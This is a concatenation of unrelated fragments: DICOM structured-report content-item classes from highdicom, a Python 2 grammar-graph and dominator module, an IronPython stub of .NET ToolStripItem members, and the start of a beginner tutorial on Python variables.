None: if not all(isinstance(i, ContentItem) for i in items): raise TypeError( 'Items of "{}" must have type ContentItem.'.format( self.__class__.__name__ ) ) super(ContentSequence, self).__init__(items) def __setitem__(self, position: int, item: ContentItem) -> None: self.insert(position, item) def __contains__(self, item: ContentItem) -> bool: return any(contained_item == item for contained_item in self) def get_nodes(self) -> 'ContentSequence': """Gets content items that represent nodes in the content tree, i.e. target items that have a `ContentSequence` attribute. Returns ------- highdicom.sr.value_types.ContentSequence[highdicom.sr.value_types.ContentItem] matched content items """ return self.__class__([ item for item in self if hasattr(item, 'ContentSequence') ]) def append(self, item: ContentItem) -> None: """Appends a content item to the sequence. 
Parameters ---------- item: highdicom.sr.value_types.ContentItem content item """ if not isinstance(item, ContentItem): raise TypeError( 'Items of "{}" must have type ContentItem.'.format( self.__class__.__name__ ) ) super(ContentSequence, self).append(item) def extend(self, items: Sequence[ContentItem]) -> None: """Extends multiple content items to the sequence. Parameters ---------- items: Sequence[highdicom.sr.value_types.ContentItem] content items """ for i in items: self.append(i) def insert(self, position: int, item: ContentItem) -> None: """Inserts a content item into the sequence at a given position. Parameters ---------- position: int index position item: highdicom.sr.value_types.ContentItem content item """ if not isinstance(item, ContentItem): raise TypeError( 'Items of "{}" must have type ContentItem.'.format( self.__class__.__name__ ) ) super(ContentSequence, self).insert(position, item) class CodeContentItem(ContentItem): """DICOM SR document content item for value type CODE.""" def __init__( self, name: Union[Code, CodedConcept], value: Union[Code, CodedConcept], relationship_type: Optional[ Union[str, RelationshipTypeValues] ] = None ) -> None: """ Parameters ---------- name: Union[highdicom.sr.coding.CodedConcept, pydicom.sr.coding.Code] concept name value: Union[highdicom.sr.coding.CodedConcept, pydicom.sr.coding.Code] coded value or an enumerated item representing a coded value relationship_type: Union[highdicom.sr.enum.RelationshipTypeValues, str], optional type of relationship with parent content item """ # noqa super(CodeContentItem, self).__init__( ValueTypeValues.CODE, name, relationship_type ) if not isinstance(value, (CodedConcept, Code, )): raise TypeError( 'Argument "value" must have type CodedConcept or Code.' ) if isinstance(value, Code): value = CodedConcept(*value) self.ConceptCodeSequence = [value] class PnameContentItem(ContentItem): """DICOM SR document content item for value type PNAME.""" def __init__( self, name: Union[Code, CodedConcept], value: Union[str, PersonName], relationship_type: Optional[ Union[str, RelationshipTypeValues] ] = None ) -> None: """ Parameters ---------- name: Union[highdicom.sr.coding.CodedConcept, pydicom.sr.coding.Code] concept name value: Union[str, pydicom.valuerep.PersonName] name of the person relationship_type: Union[highdicom.sr.enum.RelationshipTypeValues, str], optional type of relationship with parent content item """ # noqa super(PnameContentItem, self).__init__( ValueTypeValues.PNAME, name, relationship_type ) self.PersonName = PersonName(value) class TextContentItem(ContentItem): """DICOM SR document content item for value type TEXT.""" def __init__( self, name: Union[Code, CodedConcept], value: str, relationship_type: Optional[ Union[str, RelationshipTypeValues] ] = None ) -> None: """ Parameters ---------- name: Union[highdicom.sr.coding.CodedConcept, pydicom.sr.coding.Code] concept name value: str description of the concept in free text relationship_type: Union[highdicom.sr.enum.RelationshipTypeValues, str], optional type of relationship with parent content item """ # noqa super(TextContentItem, self).__init__( ValueTypeValues.TEXT, name, relationship_type ) self.TextValue = str(value) class TimeContentItem(ContentItem): """DICOM SR document content item for value type TIME.""" def __init__( self, name: Union[Code, CodedConcept], value: Union[str, datetime.time, TM], relationship_type: Optional[ Union[str, RelationshipTypeValues] ] = None ) -> None: """ Parameters ---------- name: 
Union[highdicom.sr.coding.CodedConcept, pydicom.sr.coding.Code] concept name value: Union[str, datetime.time, pydicom.valuerep.TM] time relationship_type: Union[highdicom.sr.enum.RelationshipTypeValues, str], optional type of relationship with parent content item """ # noqa super(TimeContentItem, self).__init__( ValueTypeValues.TIME, name, relationship_type ) self.Time = TM(value) class DateContentItem(ContentItem): """DICOM SR document content item for value type DATE.""" def __init__( self, name: Union[Code, CodedConcept], value: Union[str, datetime.date, DA], relationship_type: Optional[ Union[str, RelationshipTypeValues] ] = None ) -> None: """ Parameters ---------- name: Union[highdicom.sr.coding.CodedConcept, pydicom.sr.coding.Code] concept name value: Union[str, datetime.date, pydicom.valuerep.DA] date relationship_type: Union[highdicom.sr.enum.RelationshipTypeValues, str], optional type of relationship with parent content item """ # noqa super(DateContentItem, self).__init__( ValueTypeValues.DATE, name, relationship_type ) self.Date = DA(value) class DateTimeContentItem(ContentItem): """DICOM SR document content item for value type DATETIME.""" def __init__( self, name: Union[Code, CodedConcept], value: Union[str, datetime.datetime, DT], relationship_type: Optional[ Union[str, RelationshipTypeValues] ] = None ) -> None: """ Parameters ---------- name: Union[highdicom.sr.coding.CodedConcept, pydicom.sr.coding.Code] concept name value: Union[str, datetime.datetime, pydicom.valuerep.DT] datetime relationship_type: Union[highdicom.sr.enum.RelationshipTypeValues, str], optional type of relationship with parent content item """ # noqa super(DateTimeContentItem, self).__init__( ValueTypeValues.DATETIME, name, relationship_type ) self.DateTime = DT(value) class UIDRefContentItem(ContentItem): """DICOM SR document content item for value type UIDREF.""" def __init__( self, name: Union[Code, CodedConcept], value: Union[str, UID], relationship_type: Optional[ Union[str, RelationshipTypeValues] ] = None ) -> None: """ Parameters ---------- name: Union[highdicom.sr.coding.CodedConcept, pydicom.sr.coding.Code] concept name value: Union[pydicom.uid.UID, str] unique identifier relationship_type: Union[highdicom.sr.enum.RelationshipTypeValues, str], optional type of relationship with parent content item """ # noqa super(UIDRefContentItem, self).__init__( ValueTypeValues.UIDREF, name, relationship_type ) self.UID = value class NumContentItem(ContentItem): """DICOM SR document content item for value type NUM.""" def __init__( self, name: Union[Code, CodedConcept], value: Optional[Union[int, float]] = None, unit: Optional[Union[Code, CodedConcept]] = None, qualifier: Optional[Union[Code, CodedConcept]] = None, relationship_type: Optional[ Union[str, RelationshipTypeValues] ] = None ) -> None: """ Parameters ---------- name: Union[highdicom.sr.coding.CodedConcept, pydicom.sr.coding.Code] concept name value: Union[int, float], optional numeric value unit: Union[highdicom.sr.coding.CodedConcept, pydicom.sr.coding.Code], optional coded units of measurement (see `CID 7181 <http://dicom.nema.org/medical/dicom/current/output/chtml/part16/sect_CID_7181.html>`_ "Abstract Multi-dimensional Image Model Component Units") qualifier: Union[highdicom.sr.coding.CodedConcept, pydicom.sr.coding.Code], optional qualification of numeric value or as an alternative to numeric value, e.g., reason for absence of numeric value (see `CID 42 <http://dicom.nema.org/medical/dicom/current/output/chtml/part16/sect_CID_42.html>`_ 
"Numeric Value Qualifier" for options) relationship_type: Union[highdicom.sr.enum.RelationshipTypeValues, str], optional type of relationship with parent content item Note ---- Either `value` and `unit` or `qualifier` must be specified. """ # noqa super(NumContentItem, self).__init__( ValueTypeValues.NUM, name, relationship_type ) if value is not None: self.MeasuredValueSequence: List[Dataset] = [] measured_value_sequence_item = Dataset() if not isinstance(value, (int, float, )): raise TypeError( 'Argument "value" must have type "int" or "float".' ) measured_value_sequence_item.NumericValue = value if isinstance(value, float): measured_value_sequence_item.FloatingPointValue = value if not isinstance(unit, (CodedConcept, Code, )): raise TypeError( 'Argument "unit" must have type CodedConcept or Code.' ) if isinstance(unit, Code): unit = CodedConcept(*unit) measured_value_sequence_item.MeasurementUnitsCodeSequence = [unit] self.MeasuredValueSequence.append(measured_value_sequence_item) elif qualifier is not None: if not isinstance(qualifier, (CodedConcept, Code, )): raise TypeError( 'Argument "qualifier" must have type "CodedConcept" or ' '"Code".' ) if isinstance(qualifier, Code): qualifier = CodedConcept(*qualifier) self.NumericValueQualifierCodeSequence = [qualifier] else: raise ValueError( 'Either argument "value" or "qualifier" must be specified ' 'upon creation of NumContentItem.' ) class ContainerContentItem(ContentItem): """DICOM SR document content item for value type CONTAINER.""" def __init__( self, name: Union[Code, CodedConcept], is_content_continuous: bool = True, template_id: Optional[str] = None, relationship_type: Optional[ Union[str, RelationshipTypeValues] ] = None ) -> None: """ Parameters ---------- name: Union[highdicom.sr.coding.CodedConcept, pydicom.sr.coding.Code] concept name is_content_continous: bool, optional whether contained content items are logically linked in a continuous manner or separate items (default: ``True``) template_id: str, optional SR template identifier relationship_type: str, optional type of relationship with parent
import typesystem import warnings import graphviz from collections import defaultdict class Atom(object): def __init__(self): super(Atom, self).__init__() self.sync = dict() self.expects = set() def get_nullable(self): return None def get_sync(self): return self.sync def __repr__(self): return self.name class ExpectedName: def __init__(self, name): self.name = name def __hash__(self): return hash(self.name) def __eq__(self, other): return self.name == other.name def __repr__(self): return self.name class Rule: def __init__(self, id, sequence): self.id = id self.sequence = sequence def is_nullable(self): def reducer(seq, atom): if seq == None: return None atom_seq = atom.get_nullable() if atom_seq == None: return None return seq + atom_seq return reduce(reducer, self.sequence, []) def get_rule_ids(rule): ids = defaultdict(lambda : 0) for atom in rule: if isinstance(atom, RuleIdentity): ids[atom] = ids[atom] + 1 return ids class GraphNode(object): def __init__(self): super(GraphNode, self).__init__() self.inedges = [] self.outedges = [] self.outpaths = [] self.inpaths = [] self.marked = False self.name = "empty" self.accessible = set() self.ancestors = set() self.graph = None self.processed = False def is_empty_node(self): return False def add_to_graph(self, graph): self.graph = graph self.add_node(graph) for edge in self.inedges: self.add_edge_to_graph(edge, self.graph) def add_edge_to_graph(self, edge, graph): label = "" #str(list(get_rule_ids(edge.rule).iterkeys())) graph.edge(str(edge.outv), str(edge.inv), label) def add_node(self, graph): graph.node(str(self), str(self)) def __repr__(self): return self.name def make_edges(self): for rule in self.rules: lhs = [] for (index,atom) in enumerate(rule): if isinstance(atom, GraphNode): edge = Edge(atom, self, lhs + rule[index:]) self.inedges.append(edge) if self.graph != None: self.add_edge_to_graph(edge, self.graph) atom.outedges.append(edge) nullable = atom.get_nullable() if nullable == None: lhs = None break lhs.extend(nullable) class EmptyGraphNode(GraphNode): def __init__(self): super(EmptyGraphNode, self).__init__() def is_empty_node(self): return True EmptyNode = EmptyGraphNode() class Terminal(Atom,GraphNode): def __init__(self, name): super(Terminal, self).__init__() self.name = name self.type = typesystem.TypeVar(self.name) self.sync = dict([(self, (0, [self])), (None, (1, [self]))]) self.expects = set([self]) self.processed = True def add_node(self, graph): graph.node(str(self), str(self), fillcolor="turquoise", style="filled") def get_id(self): if hasattr(self, "id"): return self.id return self.name class LoopPath(Atom,GraphNode): def __init__(self, node): super(LoopPath, self).__init__() self.node = node self.sync = dict() self.name = "%s loop" % (self.node) self.processed = False def add_node(self, graph): graph.node(str(self), str(self), fillcolor="coral", style="filled") def do_work(self, grammar): paths = [] for edge in self.node.outedges: if edge.inv == self.node: paths.append(path_extend(([], [], self.node), (edge.rule, self.node))) elif self.node in edge.inv.accessible: prepath = path_extend(([], [], self.node), (edge.rule, edge.inv)) path = find_path(grammar, edge.inv, self.node) paths.append(paths_concat(prepath, path)) self.rules = [] for (lhs,rhs,prod) in paths: if len(lhs) > 0: warnings.warn("Loop action %s ignored" % rhs) else: self.rules.append(rhs + [self]) self.rules.append([]) self.nullable = [] def get_nullable(self): return self.nullable class SplitPath(Atom,GraphNode): def __init__(self, start, end): 
super(SplitPath, self).__init__() self.name = "(%s->%s)" % (start, end) self.start = start self.sync = dict() self.end = end self.nullable = None def add_node(self, graph): graph.node(str(self), str(self), fillcolor="pink", style="filled") def do_work(self, grammar): paths = [] for edge in self.start.outedges: if (self.end in edge.inv.accessible or self.end == edge.inv) and (edge.inv != self.start): path = find_path(grammar, edge.inv, self.end) if not edge.inv.processed: raise RuntimeError("Attempting to process node while dependencies are not processed") rhs = [grammar.get_loop(edge.inv)] if edge.inv in edge.inv.accessible else [] prepath = path_extend(([], [], self.start), (edge.rule + rhs, edge.inv)) paths.append(paths_concat(prepath, path)) self.rules = [] for (lhs,rhs,prod) in paths: if len(lhs)> 0: warnings.warn("Split action %s ignored (while processing %s)" % ((lhs, rhs), self)) else: ids = get_rule_ids(rhs) if any(map(lambda k : k > 1, ids.itervalues())): warnings.warn("Split action %s ignored (rule repetition) (while processing %s)" % (rhs, self)) else: self.rules.append(rhs) def get_nullable(self): return self.nullable class NonTerminal(Atom, GraphNode): def __init__(self, name, expected_name): super(NonTerminal, self).__init__() self.sync = dict() self.name = name self.type = typesystem.TypeVar(self.name) self.nullable = None self.rules = [] self.processed = False if expected_name != None: self.expects = frozenset([expected_name]) def add_node(self, graph): graph.node(str(self), str(self), fillcolor="lawngreen", style="filled") def add_rule(self, id, rule, action): total_rule = rule + [action, id] self.rules.append(total_rule) def get_nullable(self): return self.nullable class Edge: def __init__(self, outv, inv, rule): self.outv = outv self.inv = inv self.rule = rule class RuleIdentity(Atom): def __init__(self, text): super(RuleIdentity, self).__init__() self.text = text self.sync = dict([(None, (0, []))]) self.processed = True def get_nullable(self): return [self] def __repr__(self): return "(%s)" % self.text def instance(self): return RuleIdentity(self.text) class Action(Atom): def __init__(self, type, code): super(Action, self).__init__() self.type = type self.code = code self.sync = dict([(None, (0, [self]))]) self.processed = True def get_nullable(self): return [self] def __repr__(self): return "(%s){" % (self.type) + self.code + "}" class Grammar: def __init__(self): self.terminals = dict() self.non_terminals = [] self.loops = dict() self.splits = dict() self.worklist = [] self.graph = graphviz.Digraph(engine="dot") def add_nt(self, nt): self.non_terminals.append(nt) nt.add_to_graph(self.graph) def get_terminal(self, name): if name not in self.terminals: terminal = Terminal(name) self.terminals[name] = terminal terminal.add_to_graph(self.graph) return self.terminals[name] def get_split(self, start, end): if (start,end) not in self.splits: splitPath = SplitPath(start, end) self.splits[(start,end)] = splitPath self.worklist.append(splitPath) splitPath.add_to_graph(self.graph) return self.splits[(start,end)] def get_loop(self, node): if node not in self.loops: loopPath = LoopPath(node) self.loops[node] = loopPath self.worklist.append(loopPath) loopPath.add_to_graph(self.graph) return self.loops[node] def do_work(self): def iterate_local(fn, list): while any(map(fn, list)): pass worklist = [] while len(self.worklist) > 0: newlist = self.worklist worklist.extend(newlist) self.worklist = [] for atom in newlist: atom.do_work(self) iterate_local(update_nullable, worklist) for 
atom in worklist: atom.make_edges() for atom in worklist: find_transitive_closure(atom) iterate_local(update_sync, worklist) iterate_local(update_expected, worklist) def iterate(self, fn): while any(map(fn, self.non_terminals)): pass def make_edges(self): for nt in self.non_terminals: nt.make_edges() def compare_sync(sync1, sync2): if len(sync1) != len(sync2): return False for k,(cost,rule) in sync1.iteritems(): if k not in sync2: return False if sync2[k][0] != cost: return False return True def eval_nullable(nt): nullables = map(lambda rule : Rule(None, rule).is_nullable(), nt.rules) for nullable in nullables: if nullable != None: return nullable return None def rule_expected(rule): expected = set() for atom in rule: expected.update(atom.expects) if atom.get_nullable() == None: break return expected def eval_expected(nt): if isinstance(nt.expects, frozenset): return nt.expects return reduce(lambda s, rule : s.union(rule_expected(rule)), nt.rules, set()) def update_expected(nt): expected = eval_expected(nt) if expected != nt.expects: nt.expects = expected return True return False def eval_sync_set(nt): sync = dict() for rule in nt.rules: skip_rule = [] skip_cost = 0 for index, atom in enumerate(rule): atom_sync = atom.get_sync() for (term,(cost,syncrule)) in atom_sync.iteritems(): if term != None and (term not in sync or skip_cost + cost < sync[term][0]): sync[term] = (skip_cost + cost, skip_rule + syncrule + rule[index + 1:]) if None in atom_sync: skip_cost = skip_cost + atom_sync[None][0] skip_rule.extend(atom_sync[None][1]) else: skip_rule = None break if skip_rule <> None: if None not in sync or sync[None][0] > skip_cost: sync[None] = (skip_cost, skip_rule) return sync def update_sync(nt): sync = eval_sync_set(nt) if not compare_sync(sync, nt.sync): nt.sync = sync return True return False def update_nullable(nt): if nt.get_nullable() == None: nt.nullable = eval_nullable(nt) if nt.nullable != None: return True return False def find_transitive_closure(nt): def visit_dfs(root, atom): for edge in atom.inedges: if edge.outv not in root.ancestors: root.ancestors.add(edge.outv) edge.outv.accessible.add(root) visit_dfs(root, edge.outv) visit_dfs(nt, nt) nt.processed = True class DominatorSet: def __init__(self, start, end): all_set = set() def find_nodes(all_set, v): if v not in all_set: all_set.add(v) for ov in v.accessible: if end in ov.accessible or end == ov: find_nodes(all_set, ov) find_nodes(all_set, start) doms = dict() doms[start] = set([start]) for v in all_set: if v != start: doms[v] = all_set.copy() changes = True while changes: changes = False for v in all_set: if v != start: new_set = all_set.copy() for edge in v.inedges: iv = edge.outv if iv in all_set: new_set.intersection_update(doms[iv]) new_set.add(v) if new_set != doms[v]: changes = True doms[v] = new_set self.doms = doms self.idoms = dict() for v in all_set: for dom in self.doms[v]: if dom != v: idom = True for dom1 in self.doms[v]: if dom1 != v and self.is_sdom(dom, dom1): idom = False if idom: self.idoms[v] = dom def is_dom(self, start, end): return start in self.doms[end] def is_sdom(self, start, end): return start in self.doms[end] and start != end def get_idom(self, node): return self.idoms[node] if node in self.idoms else None def get_dominators(self, node): return self.doms[node] def path_extend(path, rule_prod): (lhs, rhs, root) = path (rule, prod) = rule_prod if root.is_empty_node(): rule_lhs = [] rule_rhs = rule[:] else: pos = rule.index(root) rule_lhs = filter(lambda t : not isinstance(t, RuleIdentity), 
rule[:pos]) rule_rhs = rule[pos+1:] root = prod lhs = rule_lhs + lhs rhs = rhs + rule_rhs return (lhs, rhs, root) def paths_concat(l, r): (llhs, lrhs, lroot) = l (rlhs, rrhs, rroot) = r return (rlhs + llhs, lrhs + rrhs, rroot) def find_path(grammar, start, end): seq = [] dom = DominatorSet(start, end) cur = end while cur
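# A small illustrative sketch of how the classes above fit together. The rule names and
# action bodies are hypothetical; the front end that actually builds Grammar objects is not
# part of this excerpt (and find_path above is cut off), so this is a sketch only:
if __name__ == "__main__":
    grammar = Grammar()
    expr = NonTerminal("expr", None)
    num = grammar.get_terminal("NUM")
    plus = grammar.get_terminal("PLUS")
    # expr -> NUM | expr PLUS NUM, each alternative tagged with an identity and an action
    expr.add_rule(RuleIdentity("expr:num"), [num], Action("expr", "push($1)"))
    expr.add_rule(RuleIdentity("expr:add"), [expr, plus, num], Action("expr", "add($1, $3)"))
    grammar.add_nt(expr)
    grammar.make_edges()
    grammar.iterate(update_nullable)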
An System.EventArgs that contains the event data. """ pass def PerformClick(self): """ PerformClick(self: ToolStripItem) Activates the System.Windows.Forms.ToolStripItem when it is clicked with the mouse. """ pass def ProcessCmdKey(self,*args): """ ProcessCmdKey(self: ToolStripItem,m: Message,keyData: Keys) -> (bool,Message) Processes a command key. m: A System.Windows.Forms.Message,passed by reference,that represents the window message to process. keyData: One of the System.Windows.Forms.Keys values that represents the key to process. Returns: false in all cases. """ pass def ProcessDialogKey(self,*args): """ ProcessDialogKey(self: ToolStripItem,keyData: Keys) -> bool Processes a dialog key. keyData: One of the System.Windows.Forms.Keys values that represents the key to process. Returns: true if the key was processed by the item; otherwise,false. """ pass def ProcessMnemonic(self,*args): """ ProcessMnemonic(self: ToolStripItem,charCode: Char) -> bool Processes a mnemonic character. charCode: The character to process. Returns: true in all cases. """ pass def ResetBackColor(self): """ ResetBackColor(self: ToolStripItem) This method is not relevant to this class. """ pass def ResetDisplayStyle(self): """ ResetDisplayStyle(self: ToolStripItem) This method is not relevant to this class. """ pass def ResetFont(self): """ ResetFont(self: ToolStripItem) This method is not relevant to this class. """ pass def ResetForeColor(self): """ ResetForeColor(self: ToolStripItem) This method is not relevant to this class. """ pass def ResetImage(self): """ ResetImage(self: ToolStripItem) This method is not relevant to this class. """ pass def ResetMargin(self): """ ResetMargin(self: ToolStripItem) This method is not relevant to this class. """ pass def ResetPadding(self): """ ResetPadding(self: ToolStripItem) This method is not relevant to this class. """ pass def ResetRightToLeft(self): """ ResetRightToLeft(self: ToolStripItem) This method is not relevant to this class. """ pass def ResetTextDirection(self): """ ResetTextDirection(self: ToolStripItem) This method is not relevant to this class. """ pass def Select(self): """ Select(self: ToolStripItem) Selects the item. """ pass def SetBounds(self,*args): """ SetBounds(self: ToolStripItem,bounds: Rectangle) Sets the size and location of the item. bounds: A System.Drawing.Rectangle that represents the size and location of the System.Windows.Forms.ToolStripItem """ pass def SetVisibleCore(self,*args): """ SetVisibleCore(self: ToolStripItem,visible: bool) Sets the System.Windows.Forms.ToolStripItem to the specified visible state. visible: true to make the System.Windows.Forms.ToolStripItem visible; otherwise,false. """ pass def ToString(self): """ ToString(self: ToolStripItem) -> str Returns: A System.String containing the name of the System.ComponentModel.Component,if any,or null if the System.ComponentModel.Component is unnamed. """ pass def __enter__(self,*args): """ __enter__(self: IDisposable) -> object Provides the implementation of __enter__ for objects which implement IDisposable. """ pass def __exit__(self,*args): """ __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) Provides the implementation of __exit__ for objects which implement IDisposable. """ pass def __init__(self,*args): """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) 
initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod def __new__(self,*args): #cannot find CLR constructor """ __new__(cls: type) __new__(cls: type,text: str,image: Image,onClick: EventHandler) __new__(cls: type,text: str,image: Image,onClick: EventHandler,name: str) """ pass def __str__(self,*args): pass AccessibilityObject=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets the System.Windows.Forms.AccessibleObject assigned to the control. Get: AccessibilityObject(self: ToolStripItem) -> AccessibleObject """ AccessibleDefaultActionDescription=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets the default action description of the control for use by accessibility client applications. Get: AccessibleDefaultActionDescription(self: ToolStripItem) -> str Set: AccessibleDefaultActionDescription(self: ToolStripItem)=value """ AccessibleDescription=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets the description that will be reported to accessibility client applications. Get: AccessibleDescription(self: ToolStripItem) -> str Set: AccessibleDescription(self: ToolStripItem)=value """ AccessibleName=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets the name of the control for use by accessibility client applications. Get: AccessibleName(self: ToolStripItem) -> str Set: AccessibleName(self: ToolStripItem)=value """ AccessibleRole=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets the accessible role of the control,which specifies the type of user interface element of the control. Get: AccessibleRole(self: ToolStripItem) -> AccessibleRole Set: AccessibleRole(self: ToolStripItem)=value """ Alignment=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets a value indicating whether the item aligns towards the beginning or end of the System.Windows.Forms.ToolStrip. Get: Alignment(self: ToolStripItem) -> ToolStripItemAlignment Set: Alignment(self: ToolStripItem)=value """ AllowDrop=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets a value indicating whether drag-and-drop and item reordering are handled through events that you implement. Get: AllowDrop(self: ToolStripItem) -> bool Set: AllowDrop(self: ToolStripItem)=value """ Anchor=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets the edges of the container to which a System.Windows.Forms.ToolStripItem is bound and determines how a System.Windows.Forms.ToolStripItem is resized with its parent. Get: Anchor(self: ToolStripItem) -> AnchorStyles Set: Anchor(self: ToolStripItem)=value """ AutoSize=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets a value indicating whether the item is automatically sized. Get: AutoSize(self: ToolStripItem) -> bool Set: AutoSize(self: ToolStripItem)=value """ AutoToolTip=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets a value indicating whether to use the System.Windows.Forms.ToolStripItem.Text property or the System.Windows.Forms.ToolStripItem.ToolTipText property for the System.Windows.Forms.ToolStripItem ToolTip. 
Get: AutoToolTip(self: ToolStripItem) -> bool Set: AutoToolTip(self: ToolStripItem)=value """ Available=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets a value indicating whether the System.Windows.Forms.ToolStripItem should be placed on a System.Windows.Forms.ToolStrip. Get: Available(self: ToolStripItem) -> bool Set: Available(self: ToolStripItem)=value """ BackColor=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets the background color for the item. Get: BackColor(self: ToolStripItem) -> Color Set: BackColor(self: ToolStripItem)=value """ BackgroundImage=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets the background image displayed in the item. Get: BackgroundImage(self: ToolStripItem) -> Image Set: BackgroundImage(self: ToolStripItem)=value """ BackgroundImageLayout=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets the background image layout used for the System.Windows.Forms.ToolStripItem. Get: BackgroundImageLayout(self: ToolStripItem) -> ImageLayout Set: BackgroundImageLayout(self: ToolStripItem)=value """ Bounds=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets the size and location of the item. Get: Bounds(self: ToolStripItem) -> Rectangle """ CanRaiseEvents=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets a value indicating whether the component can raise an event. """ CanSelect=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets a value indicating whether the item can be selected. Get: CanSelect(self: ToolStripItem) -> bool """ ContentRectangle=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets the area where content,such as text and icons,can be placed within a System.Windows.Forms.ToolStripItem without overwriting background borders. Get: ContentRectangle(self: ToolStripItem) -> Rectangle """ DefaultAutoToolTip=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets a value indicating whether to display the System.Windows.Forms.ToolTip that is defined as the default. """ DefaultDisplayStyle=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets a value indicating what is displayed on the System.Windows.Forms.ToolStripItem. """ DefaultMargin=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets the default margin of an item. """ DefaultPadding=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets the internal spacing characteristics of the item. """ DefaultSize=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets the default size of the item. """ DesignMode=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets a value that indicates whether the System.ComponentModel.Component is currently in design mode. """ DismissWhenClicked=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets a value indicating whether items on a System.Windows.Forms.ToolStripDropDown are hidden after they are clicked. """ DisplayStyle=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets whether text and images are displayed on a System.Windows.Forms.ToolStripItem. 
Get: DisplayStyle(self: ToolStripItem) -> ToolStripItemDisplayStyle Set: DisplayStyle(self: ToolStripItem)=value """ Dock=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets which System.Windows.Forms.ToolStripItem borders are docked to its parent control and determines how a System.Windows.Forms.ToolStripItem is resized with its parent. Get: Dock(self: ToolStripItem) -> DockStyle Set: Dock(self: ToolStripItem)=value """ DoubleClickEnabled=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets a value indicating whether the System.Windows.Forms.ToolStripItem can be activated by double-clicking the mouse. Get: DoubleClickEnabled(self: ToolStripItem) -> bool Set: DoubleClickEnabled(self: ToolStripItem)=value """ Enabled=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets a value indicating whether the parent control of the System.Windows.Forms.ToolStripItem is enabled. Get: Enabled(self: ToolStripItem) -> bool Set: Enabled(self: ToolStripItem)=value """ Events=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets the list of event handlers that are attached to this System.ComponentModel.Component. """ Font=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets the font of the text displayed by the item. Get: Font(self: ToolStripItem) -> Font Set: Font(self: ToolStripItem)=value """ ForeColor=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets the foreground color of the item. Get: ForeColor(self: ToolStripItem) -> Color Set: ForeColor(self: ToolStripItem)=value """ Height=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets the height,in pixels,of a System.Windows.Forms.ToolStripItem. Get: Height(self: ToolStripItem) -> int Set: Height(self: ToolStripItem)=value """ Image=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets the image that is displayed on a System.Windows.Forms.ToolStripItem. Get: Image(self: ToolStripItem) -> Image Set: Image(self: ToolStripItem)=value """ ImageAlign=property(lambda
# Variables

When programming in Python, you'll become very comfortable with creating variables. This is because *everything* in Python is implemented as an **object**. This means that whether you're working with numbers, words, or booleans (we'll talk about these soon!), you're working with objects. These objects are stored in what we call **variables**.

In this chapter, we'll introduce how to define variables, a few different *types* of variables, and get you working with variables in Python.

## Defining Variables

Variables are defined with a single equals sign (`=`). When variables are defined, we say that they are **assigned**. This is because the information you want the variable to store (the information to the right of the `=`) is *assigned* to the variable (the thing on the left). This will always be true in Python - the variable will be to the left of the `=` and the information you want it to store will be on the right.

You can think of variables like a container. Containers store things, the same way variables store information. The label on the container is similar to the *name* of the variable.

For example, let's define our first variable!

<div class="alert alert-success">
In programming, variables are things that store values. <b>Variables</b> are defined with <code>name = value</code>.
</div>

# define the variable 'var_1'
var_1 = 6

With our container analogy, the variable `var_1` is the container. Like containers, variables store some information. The information stored in `var_1` is, in this case, the number 6. So, the name of the variable is `var_1` and the information assigned to it (or stored in it) is the number 6.

You can store lots of different *types* of information in variables. We'll discuss a few of them in this chapter and introduce even more later. For example, variables can store words or letters, as you see here:

# define the variable 'var_2'
var_2 = 'string'

This second variable - `var_2` - has a different name than our first variable and stores different information. Here, it stores the word 'string'. We'll get to the different *types* of variables in just a second.

## Code Variables != Math Variables

An important point to discuss is that many people are familiar with the word **variable** from mathematics. However, variables in *code* are not the same thing as variables in math.

For example, in mathematics `=` refers to equality. It's a *statement of truth*. It states that whatever is to the left of the `=` is equal to whatever is to the right of the `=`.

This is not the case when it comes to code. Instead, `=` refers to assignment. It states that whatever is to the right of the `=` should be assigned to - *or stored in* - the variable to the left.

For example, when it comes to mathematics and algebra, we're familiar with the concept of solving for x. If you were asked 'What is $x$?' and given the expression $y = x + 2$, you would subtract 2 from both sides so that $x = y - 2$.

The same logic does *not* follow in programming. For example, if you were asked 'What is `x`?' and given the following two lines of code:

```python
x = 2
x = x + 1
```

you would tell me that `x` is 1 more than its previous value of 2, so `x = 3`. The line `x = x + 1` wouldn't make sense in mathematics, but it makes perfect sense in code. This is because code variables use `=` for assignment, and not as a statement of truth and equality.
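To see this in action, we can run those two lines and then check the value stored in `x`:

```python
x = 2

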